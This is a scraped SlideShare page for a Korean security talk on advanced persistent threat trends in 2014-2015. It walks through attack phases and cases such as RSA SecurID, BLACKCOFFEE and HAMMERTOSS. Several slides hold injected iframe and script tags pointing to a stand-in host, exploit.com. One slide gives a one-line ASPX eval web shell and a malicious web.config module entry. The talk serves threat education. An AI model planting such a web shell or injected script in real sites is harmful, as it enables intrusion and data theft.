SlideShare ist ein Scribd-Unternehmen logo

지능형지속위협공격 최신동향 분석

한익 주
한익 주

2014~2015년도 APT(지능형 지속 위협)의 동향

Technologie
1 von 17
Downloaden Sie, um offline zu lesen
지능형 지속 위협 최신동향 분석 주한익 코어시큐리티 교육사업부/보안기술연구팀 joohanik@coresec.co.kr
APT(지능형 지속 위협) 용어에 대한 밴더들의 정의 . Drive-By Downloads, SQL Injection, SpyWare, Phishing, Spam 등의 다양한 기술을 이용한 타겟팅 공격 . 특정 대상의 기밀정보 탈취 혹은 정치적 목적을 위해 최신의 복합적인 공격 기법을 사용하는 형태의 공격 . 즉각적인 금전적 이득이 아닌 중요한 정보를 탈취하는 것을 목표로 하여 장기간동안 은밀하게 수행하는 공격 . 장기간에 걸쳐 목표 조직 혹은 사용자의 중요한 자산을 탈취하는데 목표를 두고 수행되는 공격
 . 탐지 회피 기술을 사용하며 공격받고 있다는 사실을 숨기며, 장기간에 걸쳐서 피해를 주는 형태의 공격 . 장기간에 걸쳐 미리 정해진 특정 목표에 대해 위협을 가하는 공격
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Reconnaissance Social engineering Zero-day vulnerability Manual operations 관련 스킬셋 웹 사이트 서핑 구글링 SNS 조사 웹 사이트 취약점 공격 시스템 취약점 공격 스피어 피싱 (링크/문서파일첨부 메일) 저장매체를 이용한 악성코드 유입 워터링 홀 DEMO Step1. 공격자는 웹사이트의 취약점 공격 (웹쉘 취약점을 이용한 서버 시스템 제어권한 탈취) Step2. 공격자는 제어권한을 획득한 웹서버에 악성코드 삽입 (랜딩 페이지로 유도하는 iframe 삽입) Step3. 사용자는 공격당한 웹 사이트에 방문하게 되고 악성 프레임에 의해 익스플로잇킷의 랜딩 페이지를 
 로딩함 (랜딩 페이지는 사용자의 운영체제와 브라우저, 플러그인의 종류, 사용언어, 과거 방문여부
 등을 검사) 드라이브 바이 다운로드
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC Step1. 웹쉘 업로드 Step2. 악성 프레임/스크립트 삽입 엔터프라이즈 네트워크 인프라 Step3-1. 웹 사이트 방문 공격자 & C2 Step3-2. 랜딩 페이지 로딩 Step3-3. 웹 브라우저 플러그인
 익스플로잇 유입 Step3-3. 악성코드 감염 데이터베이스 서버
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Multiple vectors Run silent, run deep Research and analysis 관련 스킬셋 DEMO 추가 악성코드 다운로드 탐지 우회를 위한 스파게티 코드 서비스 취약점 스캐닝 운영체제 및 서비스 버전 파악 네트워크 구조 파악 Step4. 공격자는 네트워크 악성코드를 추가로 다운로드 하여 목표의 네트워크 정보를 수집함 (추가 악성코드 다운로드, 네트워크 구조 파악) 키로깅을 통한 계정정보 탈취 Step5. 사용자가 입력하는 키스트로크 정보를 로깅하여 데이터베이스 서버의 계정 정보를 수집함 (키로깅을 통한 계정정보 탈취)
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 4-1. 추가 악성코드 유입 엔터프라이즈 네트워크 인프라 데이터베이스 서버 Step 4-2. 내부 네트워크 정보 수집 Step 5. 키로깅 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js ..
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Long-term occupancy Control 관련 스킬셋 DEMO 데이터베이스 정보 접근 루트킷 설치를 통한 은닉 시스템 파괴시스템 재부팅 Step6. 공격자는 보안 솔루션의 탐지 우회를 우회 터널링 및 포트 포워딩을 수행함 (암호화 통신) 암호화 통신 Step7. 공격자는 암호화된 채널을 통해 데이터베이스 서버에 접근함 (데이터베이스 정보 접근)
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 6. 터널링 및 포트포워딩 엔터프라이즈 네트워크 인프라 데이터베이스 서버 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. Step 7. 데이터베이스 접근
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 Incursion Discovery Capture Exfiltration Phase 1 Phase 2 Phase 3 Phase 4 세부 특징 Data transmission Ongoing analysis 스킬셋 DEMO 탈취한 개인정보 판매 수집한 데이터 패킹 및 암호화 압축 탈취한 데이터 전송 Step8. 공격자는 탈취한 데이터베이스 정보를 ZIP 파일로 암호화 압축함 (수집한 데이터 패킹 및 암호화 압축) Step9. ZIP 파일을 암호화된 채널을 통해 공격자에게 전송함 (탈취한 데이터 전송)
기존 APT(기능형 지속 위협 공격)의 절차 및 시나리오 예 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 Step 9. 압축된 데이터베이스 
 파일 전송 <iframe src=http://exploit.com/land.html .. <script src=http://exploit.com/mal.js .. Step 8. 데이터베이스 정보
 수집 및 압축 엔터프라이즈 네트워크 인프라 데이터베이스 서버 익스플로잇#2익스플로잇#1 익스플로잇#N
2014~2015년도 APT(지능형 지속 위협)에서 사용되는 스킬셋의 변화 침해당한 웹서버 익스플로잇킷 서버 랜딩페이지 익스플로잇#2익스플로잇#1 익스플로잇#N •브라우저와 운영체제의 이름, 버전 체크 •설치된 브라우저 플러그인과 버전을 확인하여 
 취약 여부 확인 •취약점을 공격하는 익스플로잇 페이지로 유도 사용자 PC 공격자 & C2 데이터베이스 서버 •단일라인 웹쉘 사용 <%@ Page Language="Jscript"%>
 <%eval(Request.Item["p1"],"unsafe");%> •센서 우회를 위한 SSL 통신 사용 •IIS의 web.config 조작을 통한 악성 DLL 모듈 삽입 <modules>
 <add type="Microsoft.Exchange.Clients.Bad
 Module" name="BadModule" />
 </modules> •VPN을 이용한 조직의 
 네트워크 인프라 진입 엔터프라이즈 네트워크 인프라 •WMI/파워쉘 기반 백도어 삽입
 (objects.data 데이터베이스 파일) •소스코드가 수정된 Mimikatz를 
 이용한 메모리상 패스워드 수집 •난독화, 코드조작 예방을 위한 무결성 검사 기능 추가 •가상머신 탐지기능 추가 •공격에 사용되는 서버시스템의 도메인쉐도잉(Domain Shadowing)
2014~2015년도 APT(지능형 지속 위협)에서 사용되는 스킬셋의 변화 M-Trend 2015: A VIEW FROM THE FRONT LINES
VPN Hijacking : RSA Security "Secure ID" Hacking 사례 RSA Security 마이크로소프트 오피스 엑셀 파일이 첨부된 스피어 피싱 메일 발송 사용자 PC 사용자가 엑셀 파일을 실행함 트로이안 유형의 악성코드 감염 "Secure ID" 서버 RSA Security 내부 네트워크 OTP 생성 알고리즘, Initial Value, 사용자(고객) 내역등의 정보 접근 및 탈취 - "Secure ID"는 RSA Security의 OTP(One Time Password) - 포준 500대 기업의 75% 이상이 사용하고 있음 - 전 세계 1500만명 이상이 사용하는 대표적 OTP "Poison Ivy RAT"를 이용한 원격 제어 직원용 VPN 네트워크를 이용하여 록히드 마틴의 내부 네트워크 접근 "Secure ID" 사용 고객 "Secure ID" 사용 고객 "Secure ID" 사용 고객 탈취한 OTP 정보를 이용하여 접근 및 공격시도 F22등을 생산하는 전세계 최고의 방위 산업체 미 국방부에 통신, 정보, 정탐 및 정찰 등의 장비와 서비스를 공급하는 업체 항공우주 방위산업체
2014~2015년도 APT(지능형지속위협)의 특징 : 익스플로잇 킷의 신속한 모듈 업데이트 특징1. 패치가 발표되자마자 해당 취약점에 대한 익스플로잇 모듈 적용 패치된 취약점도 익스플로잇 킷(e.g. 앵글러, 뉴클리어)의 공격모듈로 빈번하게 사용됨 패치 업데이트를 제때 적용하기 어려운 경우 생기는 패치허점(Patching Gap)을 악용 출처 : Cisco 2015 - Midyear Security Report
2014~2015년도 APT(지능형지속위협)의 특징 : APT17 - BLACKCOFFEE 사례 특징2. SNS 및 포럼 쓰레드등을 이용한 명령체계 마이크로소프트 테크넷 포럼 쓰래드 @MICROSOFT<eight-character string with two characters per octet>CORPORATION 특정 문자열 패턴으로 구성된 
 인코딩된 C2 IP 주소 BLACKCOFEE 악성
 코드에 감염된 사용자 BLACKCOFFEE는 주기적으로 페이지를 검사하여 인코딩된 C2 IP 
 주소가 담겨진 문자열을 찾으며, 해당 문자열을 가져온 후 디코딩 BLACKCOFFEE
 C2 서버 BLACKCOFFEE는 리버스 쉘, 파일 업로드/
 다운로드, 파일 이름조작/이동/삭제, 프로세스 종료
 등의 기능을 포함하여 약 15개의 명령체계를 가짐
 미국의 정부기관, 방위산업체, 로펌, 정보보안 
 업체등에 속한 사용자를 주요 타겟으로 함

2014~2015년도 APT(지능형지속위협)의 특징 : APT29 - HAMMERTOSS 사례 특징2. SNS 및 포럼 쓰레드를 이용한 명령체계 트위터 핸들 
 (사용자의 ID와 연관된 트위터 웹 사이트) Step2 •HAMMERTOSS는 특정 날짜에 특정 트위터 핸들을 방문하도록 하는
 알고리즘을 가지고 있음 •날짜와 계정이름을 조합하여 방문할 URL 패턴을 생성하며, 주기적으로 
 변하므로 패턴을 특정하기 어려움 (e.g. https://www.twitter.com/abBob52b/) Bobby @abBob52b Step1. APT29에 속한 공격자는 지정한 날짜에 트위터 핸들을 등록
 (사용되는 핸들의 URL은 악성코드의 알고리즘과 동일하게 생성) HAMMERTOSS 악성
 코드에 감염된 사용자 Follow doctorhandbook.com#101docto •암호화된 이미지파일을 보관하고 있는 서버 URL •이미지파일 내의 암호화된 명령 문자열 옵셋과 복호에
 사용되는 문자열 doctorhandbook.com Step3. 이미지파일을 캐쉬 디렉토리에 다운로드한 후
 파일내의 데이터 복호화 및 명령 획득
 (복호된 데이터는 파워쉘 명령을 포함) 수집한 정보를 저장하는 클라우드 Step4. 명령실행 후 수집한 정보를 
 클라우드에 업로드 옵셋 101에서 암호화된 
 데이터 획득 Step5. 정보 수집
2014~2015년도 APT(지능형지속위협)의 특징 : The Inception-Framework 사례 특징3. 클라우드 스토리지를 이용한 모듈 업데이트, 홈라우터 악용

Empfohlen

Tegra 186のu-boot & Linux
Tegra 186のu-boot & LinuxTegra 186のu-boot & Linux
Tegra 186のu-boot & LinuxMr. Vengineer
 
Introduction to Linux
Introduction to LinuxIntroduction to Linux
Introduction to LinuxAnil Kumar Pugalia
 
Linux Instrumentation
Linux InstrumentationLinux Instrumentation
Linux InstrumentationDarkStarSword
 
Xen Debugging
Xen DebuggingXen Debugging
Xen DebuggingThe Linux Foundation
 
Linux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBLinux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBshimosawa
 
MikanOSと自作CPUをUSBで接続する
MikanOSと自作CPUをUSBで接続するMikanOSと自作CPUをUSBで接続する
MikanOSと自作CPUをUSBで接続するuchan_nos
 
Linux Porting to a Custom Board
Linux Porting to a Custom BoardLinux Porting to a Custom Board
Linux Porting to a Custom BoardPatrick Bellasi
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규ChangKyu Song
 

Empfohlen

Tegra 186のu-boot & Linux
Tegra 186のu-boot & LinuxTegra 186のu-boot & Linux
Tegra 186のu-boot & LinuxMr. Vengineer
 
Introduction to Linux
Introduction to LinuxIntroduction to Linux
Introduction to LinuxAnil Kumar Pugalia
 
Linux Instrumentation
Linux InstrumentationLinux Instrumentation
Linux InstrumentationDarkStarSword
 
Xen Debugging
Xen DebuggingXen Debugging
Xen DebuggingThe Linux Foundation
 
Linux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBLinux Kernel Booting Process (1) - For NLKB
Linux Kernel Booting Process (1) - For NLKBshimosawa
 
MikanOSと自作CPUをUSBで接続する
MikanOSと自作CPUをUSBで接続するMikanOSと自作CPUをUSBで接続する
MikanOSと自作CPUをUSBで接続するuchan_nos
 
Linux Porting to a Custom Board
Linux Porting to a Custom BoardLinux Porting to a Custom Board
Linux Porting to a Custom BoardPatrick Bellasi
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규ChangKyu Song
 
Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러Heungsub Lee
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationGeoffroy Van Cutsem
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...idsecconf
 
Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Emertxe Information Technologies Pvt Ltd
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototypingYan Vugenfirer
 
Part 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module ProgrammingPart 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module ProgrammingTushar B Kute
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewMoriyoshi Koizumi
 
Linux Initialization Process (2)
Linux Initialization Process (2)Linux Initialization Process (2)
Linux Initialization Process (2)shimosawa
 
Building Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 ArchBuilding Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 ArchSherif Mousa
 
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理Yuto Takei
 
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석GangSeok Lee
 
Linux systems - Getting started with setting up and embedded platform
Linux systems - Getting started with setting up and embedded platformLinux systems - Getting started with setting up and embedded platform
Linux systems - Getting started with setting up and embedded platformEmertxe Information Technologies Pvt Ltd
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 
Nindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigmaNindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigmazoran radovic
 
Berijan Tarhat
Berijan TarhatBerijan Tarhat
Berijan Tarhatsyottovasikka
 
Eclipse - Installation and quick start guide
Eclipse - Installation and quick start guideEclipse - Installation and quick start guide
Eclipse - Installation and quick start guideEmertxe Information Technologies Pvt Ltd
 
Linux Internals - Interview essentials 4.0
Linux Internals - Interview essentials 4.0Linux Internals - Interview essentials 4.0
Linux Internals - Interview essentials 4.0Emertxe Information Technologies Pvt Ltd
 
Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)Thomas Petazzoni
 
Uboot startup sequence
Uboot startup sequenceUboot startup sequence
Uboot startup sequenceHoucheng Lin
 
Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Youngjun Chang
 
APT Case Study
APT Case StudyAPT Case Study
APT Case StudyYoungjun Chang
 

Weitere ähnliche Inhalte

Was ist angesagt?

Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러Heungsub Lee
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationGeoffroy Van Cutsem
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...idsecconf
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototypingYan Vugenfirer
 
Part 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module ProgrammingPart 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module ProgrammingTushar B Kute
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewMoriyoshi Koizumi
 
Linux Initialization Process (2)
Linux Initialization Process (2)Linux Initialization Process (2)
Linux Initialization Process (2)shimosawa
 
Building Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 ArchBuilding Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 ArchSherif Mousa
 
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理Yuto Takei
 
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석GangSeok Lee
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveNetronome
 
Nindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigmaNindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigmazoran radovic
 
Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)Thomas Petazzoni
 
Uboot startup sequence
Uboot startup sequenceUboot startup sequence
Uboot startup sequenceHoucheng Lin
 

Was ist angesagt? (20)

Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러Profiling - 실시간 대화식 프로파일러
Profiling - 실시간 대화식 프로파일러
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementation
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratch
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)Embedded Android : System Development - Part III (Audio / Video HAL)
Embedded Android : System Development - Part III (Audio / Video HAL)
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototyping
 
Part 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module ProgrammingPart 02 Linux Kernel Module Programming
Part 02 Linux Kernel Module Programming
 
X / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural OverviewX / DRM (Direct Rendering Manager) Architectural Overview
X / DRM (Direct Rendering Manager) Architectural Overview
 
Linux Initialization Process (2)
Linux Initialization Process (2)Linux Initialization Process (2)
Linux Initialization Process (2)
 
Building Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 ArchBuilding Mini Embedded Linux System for X86 Arch
Building Mini Embedded Linux System for X86 Arch
 
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
[Basic 7] OS の基本 / 割り込み / システム コール / メモリ管理
 
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
[2013 CodeEngn Conference 09] Park.Sam - 게임 해킹툴의 변칙적 공격 기법 분석
 
Linux systems - Getting started with setting up and embedded platform
Linux systems - Getting started with setting up and embedded platformLinux systems - Getting started with setting up and embedded platform
Linux systems - Getting started with setting up and embedded platform
 
BPF Hardware Offload Deep Dive
BPF Hardware Offload Deep DiveBPF Hardware Offload Deep Dive
BPF Hardware Offload Deep Dive
 
Nindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigmaNindja 054 derek finegan - krvava enigma
Nindja 054 derek finegan - krvava enigma
 
Berijan Tarhat
Berijan TarhatBerijan Tarhat
Berijan Tarhat
 
Eclipse - Installation and quick start guide
Eclipse - Installation and quick start guideEclipse - Installation and quick start guide
Eclipse - Installation and quick start guide
 
Linux Internals - Interview essentials 4.0
Linux Internals - Interview essentials 4.0Linux Internals - Interview essentials 4.0
Linux Internals - Interview essentials 4.0
 
Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)Device Tree for Dummies (ELC 2014)
Device Tree for Dummies (ELC 2014)
 
Uboot startup sequence
Uboot startup sequenceUboot startup sequence
Uboot startup sequence
 

Andere mochten auch

Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Youngjun Chang
 
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20Donghan Kim
 
클라우드 서비스를 이용한 APT 대응
클라우드 서비스를 이용한 APT 대응클라우드 서비스를 이용한 APT 대응
클라우드 서비스를 이용한 APT 대응Youngjun Chang
 
[공개용]정보보호, 우리 업무의 기본
[공개용]정보보호, 우리 업무의 기본[공개용]정보보호, 우리 업무의 기본
[공개용]정보보호, 우리 업무의 기본hyundai-mnsoft
 
정보보호최근이슈및패러다임의변화 임종인(고려대)
정보보호최근이슈및패러다임의변화 임종인(고려대)정보보호최근이슈및패러다임의변화 임종인(고려대)
정보보호최근이슈및패러다임의변화 임종인(고려대)Kyuhyung Cho
 
Korean information security practices 보안 인식교육
Korean information security practices 보안 인식교육Korean information security practices 보안 인식교육
Korean information security practices 보안 인식교육Bill Hagestad II
 
201412 정보보안 보안교육자료
201412 정보보안 보안교육자료201412 정보보안 보안교육자료
201412 정보보안 보안교육자료시온시큐리티
 
Inception framework
Inception frameworkInception framework
Inception framework한익 주
 
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식INSIGHT FORENSIC
 
(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trend(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trendINSIGHT FORENSIC
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법Youngjun Chang
 
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안INSIGHT FORENSIC
 
Volatility를 이용한 memory forensics
Volatility를 이용한 memory forensicsVolatility를 이용한 memory forensics
Volatility를 이용한 memory forensicsYoungjun Chang
 
2010년 상반기 보안 위협 동향과 주요 보안 위협
2010년 상반기 보안 위협 동향과 주요 보안 위협2010년 상반기 보안 위협 동향과 주요 보안 위협
2010년 상반기 보안 위협 동향과 주요 보안 위협Youngjun Chang
 
SNS 보안 위협 사례
SNS 보안 위협 사례SNS 보안 위협 사례
SNS 보안 위협 사례Youngjun Chang
 
(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법INSIGHT FORENSIC
 
보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안보안 위협 동향과 대응 방안
보안 위협 동향과 대응 방안Youngjun Chang
 
(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)INSIGHT FORENSIC
 

Andere mochten auch (20)

Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안
 
APT Case Study
APT Case StudyAPT Case Study
APT Case Study
 
보안교육자료
보안교육자료보안교육자료
보안교육자료
 
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20
빅데이터 기술을 적용한_차세대_보안핵심_신기술의_최적_적용_및_활용방안(배포)-d_han_kim-2014-2-20
 
클라우드 서비스를 이용한 APT 대응
클라우드 서비스를 이용한 APT 대응클라우드 서비스를 이용한 APT 대응
클라우드 서비스를 이용한 APT 대응
 
[공개용]정보보호, 우리 업무의 기본
[공개용]정보보호, 우리 업무의 기본[공개용]정보보호, 우리 업무의 기본
[공개용]정보보호, 우리 업무의 기본
 
정보보호최근이슈및패러다임의변화 임종인(고려대)
정보보호최근이슈및패러다임의변화 임종인(고려대)정보보호최근이슈및패러다임의변화 임종인(고려대)
정보보호최근이슈및패러다임의변화 임종인(고려대)
 
Korean information security practices 보안 인식교육
Korean information security practices 보안 인식교육Korean information security practices 보안 인식교육
Korean information security practices 보안 인식교육
 
201412 정보보안 보안교육자료
201412 정보보안 보안교육자료201412 정보보안 보안교육자료
201412 정보보안 보안교육자료
 
Inception framework
Inception frameworkInception framework
Inception framework
 
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
 
(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trend(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trend
 
보안 위협과 악성코드 분석 기법
